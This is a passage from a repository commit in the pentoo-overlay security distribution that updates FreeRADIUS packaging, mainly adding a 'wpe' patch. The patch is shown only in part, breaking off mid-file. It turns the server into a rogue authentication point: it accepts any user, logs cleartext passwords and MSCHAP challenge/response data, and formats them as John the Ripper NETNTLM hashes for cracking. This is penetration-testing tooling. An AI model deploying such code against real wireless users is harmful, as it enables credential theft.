Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2025-12-06 16:33:09 +01:00
Code Issues Projects Releases Wiki Activity

freeradius: wpe patch update, synced with gentoo, stable

Browse source
This commit is contained in:
Anton Bolshakov 2012-12-05 04:17:50 +00:00
parent 462f9db1ab
commit 2cb28c08f3
20 changed files with 609 additions and 3649 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
net-dialup/freeradius/Manifest
View file

@ -1,30 +1,20 @@
AUX clients_wpe.conf 390 SHA256 ecc817541c5f49ef6a2ddaf87f5f87b760776375a4239aaa618d48b36e4c2497 SHA512 faf5c788187851cc74415fb790afd6cc753ceb3d9e7d838e022212e78d205ca5f7251389ee5aff5f40fa8141cd2a8dd2dc62fc9088a356fd7ed636923493151d WHIRLPOOL bb21e49aced897cea608d43ea9218ef0868c30150b330b7bd5c881ebf1473cce89ea5f5412b8dd8331ffb22cd4a4e562f5e639adf8bb7cc897273e53765cbeee
AUX eap_wpe.conf 5594 SHA256 2ab71bc501bf0f9b1e09e3a97db23c291672b3ae01f15beb4be2b71ceedc4111 SHA512 abd21acba79497803e00d4cad6cc7ff0ac643b70cad42ee6b7bc9a9f0a7a54e6eb958d5d723e3927af908c1d26c78d2d249ec349445a15f5a498e52e6f1ecf51 WHIRLPOOL 4c2a6d7b636e8df65f3c7f3abd623dd05ecd198278d640908b4b95ccc8aedd0d7a719409b73acd1893937a2da54082957643856b32c2e04d06e44ab347bec0f7
AUX freeradius-2.1.10-ipv6.patch 453 SHA256 15a227b1a9cb213763170e7f030bb30521af26ae1920a4acf51499a6628d492d SHA512 73c6ec69b830c9a9c58d93ef6d8764062938ef9757c4bb3063302b66ef456592f5e100acdfc302a0dc076d0c20eca63a176eabed1ba86ebc50be43db0dd9626d WHIRLPOOL 37bc461bb794d6f3b6be47805e46ee72e16f273455afc8b1fb0ec981b5914a787b48ec6773f728e8bcc08426dccf43855ef7f7447b72ba21b3efb24b8be7fde9
AUX freeradius-2.1.10-pkglibdir.patch 2551 SHA256 19e366a1eba9423185c5a7139f3affd0100a46ac94f5993f84a54cc77251bafc SHA512 4f2f813078aa6d08d0a576886cb5410d6152924c571726cfb965c87af880cbe52f9e8b7acc83ad78b00194c76ee444291d55a2c51a2e26c59336232b9e97f1e8 WHIRLPOOL 4c18d8530ac64ebfdc1ab70bc2bdc918d6692ac1b456890cd0727a312f2a65d7f49ac9ef07262b78cf1650078cfbd540034e1195566ca611c51d8879afbe53f6
AUX freeradius-2.1.10-qafixes.patch 56665 SHA256 10f8875ed0ca90b6075513030b9ce3cff62386c361ba7d494ca778f438fcf096 SHA512 1def6f12f31983ef5965a21e1fca5b1af2a111d2e956c3ae4a1ff4928499783c9b6fc51224e05450dd8d41a99609fcc72a9fa4a0490ba33b4ab989fd36de354d WHIRLPOOL 9b229750607a0c4bc2b011ebbdf0e2694d7c868f5fbf2bdb6ac0d4da25a0921d05b2a6a615ae5abce7a39dd57a3bf754fc22da697406e122ee77d3683d7e46f6
AUX freeradius-2.1.10-ssl.patch 582 SHA256 8ba257bea3504f1b800185af49ca0fe2a3f9bf65f0699c73e39f02e712467cef SHA512 b461158b05c404af87aa0c461e3d301780b9f5f1be935304258da51384d47024af0761ee14fe00c285f6586466484cee35c2d08089b0cef47b97bee58a66e6f0 WHIRLPOOL 82c759651b60bbfcec654404479e39494e33a297d0e76759564b2e15a6b5f51294be4e291f583765b319db27678b3912a76b0138ef70d23524bda255ddd23274
AUX freeradius-2.1.10-versionless-la-files.patch 2404 SHA256 8668376594966a6440df8a720560602ac290cedf45bce3b23d38b5a8a685c1db SHA512 c90a241c848974736fa0ab761741a47b53d0b518e2640ddbf6147834763e870b72e56fd8e40077de56074f7f925212e4b8a4eda33f0b1b5557b3d7e2217081ee WHIRLPOOL fc75bce59bde62c19cd196fcf814fb98df7fc10b3298a422e03e7aa071be2a0c9ab488ae1590b3ba33c5304951edf6445d9177602e7ba1025535ab8bb934aaf2
AUX freeradius-2.1.11-wpe.patch 13697 SHA256 f56257eea5b228c096e781f6aded15f969bc6f7079a53fb73538988593c20649 SHA512 9fc717eaa66ddd60f5454c13e38b949e9649dd1f83e702c9ed8efef54e9b1a5df7077a9ea3e7afa7d17a640336bf0e3f108f4b25a67402cfc534e5029337dba2 WHIRLPOOL 02d645ad864c9c1afc5d1a1d716fa34548ae92c8d24e88c19ecccb703c168f1438b897d7057eefa7f15cfc8bafd6196f144bcbccf65ceafe6d73c74a868e548a
AUX freeradius-2.1.12-pkglibdir.patch 2555 SHA256 e0b0444d2ecd30518ad00df3d8744ae64adf6bab640bae977b31e0220614b5dd SHA512 4c9681fd5f6f843eb01346b273b34896412b37d6fe7cc4e6e563ebc8e919369da0f753e52fc23ba50ba58e06ba4ef5b8bb351d478972526c377b8c7900d5105a WHIRLPOOL a42ddbac304429dc013bcf174fcd5cb9d16c181d72557ba0efaea2aee3af9023ce799c5c1d8d8c0c4cc0d19bb39c03c2fb9e38d5fa00c6d881183127dc50dd2c
AUX freeradius-2.1.12-qafixes.patch 3716 SHA256 f50a79b94f87a06330c95a77018e32e3ddff290d3b56a1260a637d8283476580 SHA512 76130b3afcd5e11492e04f60a1e8a5a4f5cc37f594640b36194b48eb6a514cfd3d142a6f67eb171ff69a9e02ada877f5fe0302f589724a3bdd5e04bec8fbbb9c WHIRLPOOL 4d5352d88e262acd7ab17c06b75aaafbc00a24eab4b51fdfad735c0d17bb818cd74dbffa26289965ec0ebe69cefc7d269516575995cf1dc6f236cf53ed5f485a
AUX freeradius-2.1.12-ssl.patch 583 SHA256 e7a348ad24de18f5299c2d0544d6a8ed25913a00955c2bdb108d763163b38fab SHA512 aed2dbe6207d23069910dbb330af560e61cc36bb7827552af8ec2560101255ac5ffbd9c2817e964024ea6a6517fd415fc5d3e9c4c0c12282dcdf4adfafdd8727 WHIRLPOOL 32bb834f4585769326a254642c2cad1b254e8659659889010407f26483bf747aafffd77a788556d5ad1678ff4c8ebf560cd9801ad8ce11c3f7c070bde984a930
AUX freeradius-2.1.12-versionless-la-files.patch 2408 SHA256 edf8a85096492b36e9c1c1e48aea733d5134c44c789621dce948c36227549e74 SHA512 e0b465985538f9a3de2b8254e0d8e177fa6a8d4b2e483b44618f9e0fbc03b068eb61638c00e22e6be22fda3e2b74212c9e7dde223b1621836b6bea2aa9a5c616 WHIRLPOOL e223943de35b9d8b068eb6c84b2832a04613a467bbcb0fa7925aa4adfe506cd3bc30fe0acc4b546be549d88468a1d8e8139b9b4d25a5c3e27de7202ca9eef3e6
AUX freeradius-2.1.7-nothreads.patch 514 SHA256 cad3e87971a5824d8f17fa462d7a9b0fe317261704eeebffdc404c4d41f2787a SHA512 3cc884e4469c5b9ddf551e915c1f009c17866f4647d8e090ba5928efcfae89031fbb6edde128c541faf4bc5e123847544974a514d3661d82514b91ee43729bed WHIRLPOOL 62dfb7003d87dfdc52aa92a35411e30b60877b406c5ec6975d5a74ba766635018cd1bc68892c5343bb839cce39bf68c3c26d5fc9a14d10b987edf344b351c8e7
AUX freeradius-2.1.7-pkglibdir.patch 2547 SHA256 bd7c15f0c66e80ed07bb98a731217c5260e30d628b7305849d57c907f860b1c1 SHA512 7e12d5d3d1b05cba21ce5efb82d51d9e9d66fc34410c2b1a551f03c2bcdb882be7f59d28ed98181817657f6243ca4a69224717b59fc5fcb80ffe808f458fb34c WHIRLPOOL a20b474b2e8a828dd50fd5133bac446a375046626453e201e3b45c28dfc558695fc92d2ef184c8b34cc3285ecc81dc3c4483ab915c25754a8965df3c3a8289c5
AUX freeradius-2.1.7-qafixes.patch 3686 SHA256 f0b3fc440636eeb33cc42a36d3ff344c816db55a8295bdbe816d00d4214eb1ec SHA512 5111fae1db42eb635ecdf7d4692b1295de37462a917b29d82914376df0cbeee320ba190b90bdd5585227717b2225d42bbf88dbe922ea97a207d6fcca51f7c910 WHIRLPOOL 67dc28916afc994259e6a817ce1e7ede58a7e212c08ebecfdd86fb345d77568531827f61a876979cc707138a7b323d5bcb2ffb85a5b49fd173fc8e3a028dfc84
AUX freeradius-2.1.7-ssl.patch 577 SHA256 a7a3ed31fd470c23035f79a5b6252e163dde430a5d9dbcad5cf75bbd34b78672 SHA512 1e08950d504fa04d89c640f453da43c74072c55fb46d94e618a3afa05437051a44c8a17bc6f7e6d9a435f6a7a54727507292526cbf8ef33c40297808e4ca4a04 WHIRLPOOL 2dd491dbee00e38eac55a846c10572fecda25e0e700f515d20d7f6cb9581f5f1e1d26243af711fe37f2b850937b666ab26e1ca4c3ff636ae0edb2a9a01a3bda8
AUX freeradius-2.1.7-versionless-la-files.patch 1747 SHA256 4e60188f1a2cd63b6dc775dbc8d09afd93e94b43431f7a930fed86399dd4883b SHA512 1be152682c6617a7683c8f3a016160f35de45aa116280b508f7f6c40b33c96d2480a3d7eda01b1a96d7d8781804c6ebd05d594be8831fd65f3b90d5f780452b3 WHIRLPOOL 934d1da163a87139e1a6b17ca57370114408efe1b59f1801acf32eb29f145fa509c031e38753f32aabe4b68412d51384abcb9cb5cbd502820b6d11283b239e85
AUX freeradius-2.1.7-wpe.patch 32096 SHA256 34ae76dd578ce3a497e93a7479336b2ce6eeb13be204590b8015e060bed3ef8c SHA512 82e80802beaf1021cb74b1f20d4b8c888398794a6acb8c879236ea58dff55a6df405446a3822bb81b3a1950641d795ad2c7f65d0fb72647d47c74010e8b69232 WHIRLPOOL b44a07e1a3cef83cf62dd27dc408d40de0d50ea96e7f1ed12e2d8d65e2d453eb3f42461711e7a7959e9b132eb058390bd7eb8fa22cc31f0fc0ff67bcc0ab4616
AUX freeradius-CVE-2012-3547.patch 591 SHA256 43a9ecfe1b536dd2d0a05460d42ca3d29e200e2413a4d36c96940e051f751014 SHA512 90c4d423f359eccc13d1054040eaacead56bf5ba5d8236c9523d5d97276243b00d39806c9c8386af12409fa5893d502a3b3d3e3d47bb6e334dce0ad0e3d24d79 WHIRLPOOL 921232d374f400671f27bc915a75f6de961692778dac645fb026643620773369b81a9a4f2a5f381b239d5c40e29dac5f5212d6d614b4419b17c17a3331bc3fc7
AUX freeradius-2.1.12-wpe.patch 14500 SHA256 0d0f8e7ac76b0e17603d677bb94588a07111f778809ef66583423c5d0852167f SHA512 5c5a6839eed1004d436c9d42a7a3a595e86e4832bbe952e8001d6dd5686b2ed311484f845841c18e7dd258c611b5ada1a11816516ad1fa8ab51d1231d12586e3 WHIRLPOOL 76bb59224b705994249874029cf0709334aac05054a4898af026e341002aff17745072c832e3b6363d278db210b0addfa7bf4fdb59ad99f00772790703929817
AUX radius.conf 129 SHA256 2d5b3e1af1299373182f2c8021bdf45c29db5d82b0a077b965a16ded32cb6292 SHA512 e248159c0a44f722e405c51c8015d9ad672e42ad0d38ca28f8a051ff911aa4d3e630b9bd4543e9d610940bc4ae50c022594e219ce341b36abe85c572acad418b WHIRLPOOL c409c0a928e01045f1a60aab7e24ba2ef1645a94ac120cddc6a05b39b0b2dd0e79e50bb40d68ff9ec31aa8d1173c4f2d6f626376eda7d07fc47fc491d8f2bbcf
AUX radius.conf-r3 345 SHA256 992331df42b77fe2b38fc6d715cfe0bc8d0d874fdcbbd510c9c99c85a77e6285 SHA512 353cb99bdb1c055b1590d34a4e148852de2b46f0c6292c88d1aad8c69eaaee6006e249eca79cd28dcd7690721f2ab65524f39c9015e714b10c439d343b7bf307 WHIRLPOOL 2f947c9728c7134cd8068933dd1784bfd1c39f15fa1d76f6e1c0d38087093399fe53a2a4e17b81413eb497f162ed69f19cd44129f34baa19ca2a347eaef6f9d9
AUX radius.init-r1 1575 SHA256 5f20b72e4b627442313818cbe3c31cadfdc747fad18cacdafe58de62812eea41 SHA512 25c9cec70befd126bc5d324e802ecdf2ad940478edab55cb4384f0392690cade2fa2735c1eb18d990616c3d506b470c9007292192baf7a11ffe67b79c2e6df3b WHIRLPOOL 62e0b177a62b5248494f39baedd7ed65b6b8c10d2b872bd11a0c075b8d55069e890e4c92816b8fb6a4f6abc1234eea3235f1cb4a465ad59099f6f9fdd799a0d3
AUX radius.init-r2 1358 SHA256 8a3d7d571985aef8c16c19a8b57bb7e1e2c7cf5dcfb24da421ce4bd241c5a001 SHA512 21265b729f1080a59805ac186280a4ad2cc2a26d56636b1969197ebbdf0a0fd471da31805ca9ce1e18693e90522a610ff95ec743a39f3a2b73e33ac3ee19a0da WHIRLPOOL 1b6fc4b3d55f6e69c04ea837510737e98744165f516b3bd582ee598221988dd8704e8f66781c9fa9c46d18cbb69b1c89afc79f2b48e047fb07fa592c8419c0c1
AUX radius.init-r3 766 SHA256 de9ec9dffa5eaccd40668ea85fff5c655000539582d1e78c96069b0cd071c813 SHA512 4f0257eadf642041b2dd762c8e175be82e2844362ebe0806cc9c78b074143ef1cd5dea2b644241f7b5b88a7d80e860720d39dd6d428d9c8de756ca071a1ca2fb WHIRLPOOL 42782b5912d3374dac703e9cbb37361eb4e737a6cb33121a249811c4955954f5e8523da1ac6ffcac4bd0cc90585056c47a9b2a5dde7ca1dcea21fb8e6fe506df
AUX users_wpe 99 SHA256 922a318e7f66b3b52b4a1cc53d765ff116567f010d9ce4784b4ae009fe97ca73 SHA512 8d533b6a4d3a2622ae5f2d768946840ddd49001cc0d34cb571da6123232d1987abcd3cb39a05e0ac20e680b7d9b910586532c39a9ef1af677bade856d2201fe0 WHIRLPOOL 2c2b1c27c7a8407c264425756ea386d56f8be647993ec86e26f892c97b87b7c4770651c4aa7032cfd6834d34d9f5ca708affb759d3e9e671b4a4e0f679448c64
DIST freeradius-server-2.1.11.tar.gz 4219356 SHA256 274ef96aa528d8b759f2fa06f2ba49ecbe1612e99fdedbb7016b557804b16b85
DIST freeradius-2.2.0-patches-4.tar.xz 3140 SHA256 9fd7b6f7e1501d63a073e6279b20eb6d8154e7898d81c85a5c548543ab33c1af SHA512 38ebd65d9ad8ce8f513f2f5c7fd9ff43b81cf468038a49f9eb7f4a54d13783e88866c3031e7abc0fc8b65d2aec4f347efa358b9e7e2aadb2d15567ce7e125d1d WHIRLPOOL a532444f6bfebe260a6b4bf43157fa1624ce9920a86635172ac94e0f757263904bac6ca6a472e12df73e32a8d25d6f7b094272bd743d13c566f23bfcbff6df27
DIST freeradius-server-2.1.12.tar.gz 4257106 SHA256 e597567c81ddbee385df8f076162c868ee6db5bf446c45ace94078c0c7d53805 SHA512 543ca20faa5ab2c45d7e0c9627c2860ac6eb2d1e3e920beffad612bb4a50a3ae65fe8f20a385541bca75ba05575091168de22c9c245f6869ecd5c862e6686189 WHIRLPOOL 88b8584fc8f27cfca99ec4a51ac77b653d0fa258aa80ccdd5d928893ec7a43c9c3db6a4e4716cc16d8da7dbbae64272862adba8ba3ba0558f1819996db42e5be
DIST freeradius-server-2.2.0.tar.gz 4289865 SHA256 ac22eefe7bd7c1c2b4de28613e628fd3e9ccae08a00a103e5f75aac0927bf009 SHA512 8652d27a292c3a8627c13b0bf12b829d3f2c50d82ed85eb342d1ec5c84ceabf8963907d50464a5907d2934f1b069a491411b1d5129efaaecefe4a30251b2b607 WHIRLPOOL 9f7dc926da7a33bfb425cb668bc9cf940a7a2dafa2a73ba8847a15f0d725476fdb4afc41963426ade9175709007f6f72892c3e9cd33d82c6601f57b873f92471
EBUILD freeradius-2.1.11-r1.ebuild 4821 SHA256 24df33d5700ce135f6392aef7e2182ae70ea8753cb22834affdace0d4d226b84 SHA512 4336a20ada2194bb76cfa28ae94122b920739ba0650e0143b49020545971a3e22236b9b0cc07d8938282d31d059de40daf64dab28f6870222fb44cdec5d1fcc4 WHIRLPOOL 4123b6548e91c1ecf452072e9883b1efbd9b5fcd404748d09c5bacf51e9bae9f5b2b9b4eeb2d1657a25c292c5af3594c6d0ee521e1109158133b3e87dbc20e90
EBUILD freeradius-2.1.12-r1.ebuild 5010 SHA256 8403de3b937bf12436018207aee10d8004590c6aa5ccdcb01ae1297b17a10161 SHA512 042a2b6226fcc5a18be6dd51f36b0a530393769edb33c4290dcbc267730e418518c8d9c73d45b1f2db52b3a65c12361bb60f3a0b9f98ceb1e054e20c26f646e7 WHIRLPOOL 4f374cab928bc51fb319c319f63c6278d9d0cea0a320a57ca5eef260550da0a6651a9c99ef5471bf04f90b01d03228251769470e87bcb791e21587487ead5da6
EBUILD freeradius-2.1.12.ebuild 4962 SHA256 4abb54a259e598782061354bdbd30289f20cb0a52d4748943e435052a8d65302 SHA512 c226f3956214b4b910afac46fc5276166681d7861b2a194bc51fb21f7fb9870666f70bbd602513720a0f27cc0de474235701516763e3d816cc5a5a1cb40cb55f WHIRLPOOL 1fb59344c6b9fe6fed82be8703400f459bd56220bf78174492078fa150ca217cb6899f35703c91de302f60ab9bea173af10180c59b39392abe7ef7374301ab9d
EBUILD freeradius-2.2.0-r1.ebuild 5419 SHA256 49a42d632e3aff5e722a347ff9213ffde4e6b42bd94435ab6219d23eb001b17f SHA512 c012b7a9820106c913af222c8ff929da85c563b5ceb050c8bcfd03a316fb32f0955d3a7753172e2589b5d96f0df93c60feb41c3bb8dae8aa0a337132ba953151 WHIRLPOOL 71381cd43a20eb01224638a513348e821dc7fe2ee487d14711fceb7c3ae7aec61d6bfd08fc4931ab8a1e353d4e9e4ba5609b4b86fc8c85d8f19bc6ad1d00aa25
EBUILD freeradius-2.2.0.ebuild 5016 SHA256 f00c09d7a97504f40836ac225f399d7ccb550a0a4c7ec8d56d2ca520e101f2b6 SHA512 bf2893460db3676ec12f2405544bf6fc68f488df73ac2d7a7bc31c802bf367a86579cfc4632befa5597600dbe4a1dad2333b24b661babe9e6faa6abae695fd91 WHIRLPOOL c87907ce9cc0df6e6105cfea5f60c9407f78c198325616f3a43042cdb9cfdc1c24725103b3e61499fc3e7032f13a53dc9bfdc91dbca542547f4a7231e89c3047

12
net-dialup/freeradius/files/freeradius-2.1.10-ipv6.patch
View file

@ -1,12 +0,0 @@
diff -aur freeradius-server-2.1.10.orig/src/lib/udpfromto.c freeradius-server-2.1.10/src/lib/udpfromto.c
--- freeradius-server-2.1.10.orig/src/lib/udpfromto.c 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/udpfromto.c 2011-02-09 22:41:46.000000000 +0100
@@ -87,7 +87,7 @@
* This should actually be standard IPv6
*/
proto = IPPROTO_IPV6;
- flag = IPV6_PKTINFO;
+ flag = IPV6_2292PKTINFO;
#endif
#endif
} else {

61
net-dialup/freeradius/files/freeradius-2.1.10-pkglibdir.patch
View file

@ -1,61 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/Make.inc.in freeradius-server-2.1.10/Make.inc.in
--- freeradius-server-2.1.10.orig/Make.inc.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/Make.inc.in 2011-02-09 17:51:46.000000000 +0100
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Naur freeradius-server-2.1.10.orig/raddb/radiusd.conf.in freeradius-server-2.1.10/raddb/radiusd.conf.in
--- freeradius-server-2.1.10.orig/raddb/radiusd.conf.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/raddb/radiusd.conf.in 2011-02-09 17:51:57.000000000 +0100
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Naur freeradius-server-2.1.10.orig/src/modules/Makefile freeradius-server-2.1.10/src/modules/Makefile
--- freeradius-server-2.1.10.orig/src/modules/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/Makefile 2011-02-09 17:52:11.000000000 +0100
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2011-02-09 17:50:58.000000000 +0100
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:52:53.000000000 +0100
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,11 +164,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi

2018
net-dialup/freeradius/files/freeradius-2.1.10-qafixes.patch
View file

File diff suppressed because it is too large Load diff

11
net-dialup/freeradius/files/freeradius-2.1.10-ssl.patch
View file

@ -1,11 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:41:44.000000000 +0100
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h

40
net-dialup/freeradius/files/freeradius-2.1.10-versionless-la-files.patch
View file

@ -1,40 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/src/lib/Makefile freeradius-server-2.1.10/src/lib/Makefile
--- freeradius-server-2.1.10.orig/src/lib/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/Makefile 2011-02-09 17:39:25.000000000 +0100
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:40:00.000000000 +0100
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak 2011-02-09 17:40:17.000000000 +0100
@@ -147,6 +147,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:39:43.000000000 +0100
@@ -171,6 +171,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi

376
net-dialup/freeradius/files/freeradius-2.1.12-wpe.patch Normal file
View file

@ -0,0 +1,376 @@
diff -uNr freeradius-server-2.1.12/raddb/radiusd.conf.in freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.1.12/raddb/radiusd.conf.in 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in 2012-08-15 10:34:20.369565898 -0400
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.12/raddb/users freeradius-server-2.1.12-wpe/raddb/users
--- freeradius-server-2.1.12/raddb/users 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/users 2012-08-15 10:34:20.369565898 -0400
@@ -201,3 +201,6 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -uNr freeradius-server-2.1.12/src/include/radiusd.h freeradius-server-2.1.12-wpe/src/include/radiusd.h
--- freeradius-server-2.1.12/src/include/radiusd.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/include/radiusd.h 2012-08-15 10:34:20.369565898 -0400
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.12/src/main/auth.c freeradius-server-2.1.12-wpe/src/main/auth.c
--- freeradius-server-2.1.12/src/main/auth.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/auth.c 2012-08-15 10:34:20.369565898 -0400
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.12/src/main/log.c freeradius-server-2.1.12-wpe/src/main/log.c
--- freeradius-server-2.1.12/src/main/log.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/log.c 2012-08-15 10:34:20.369565898 -0400
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,68 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
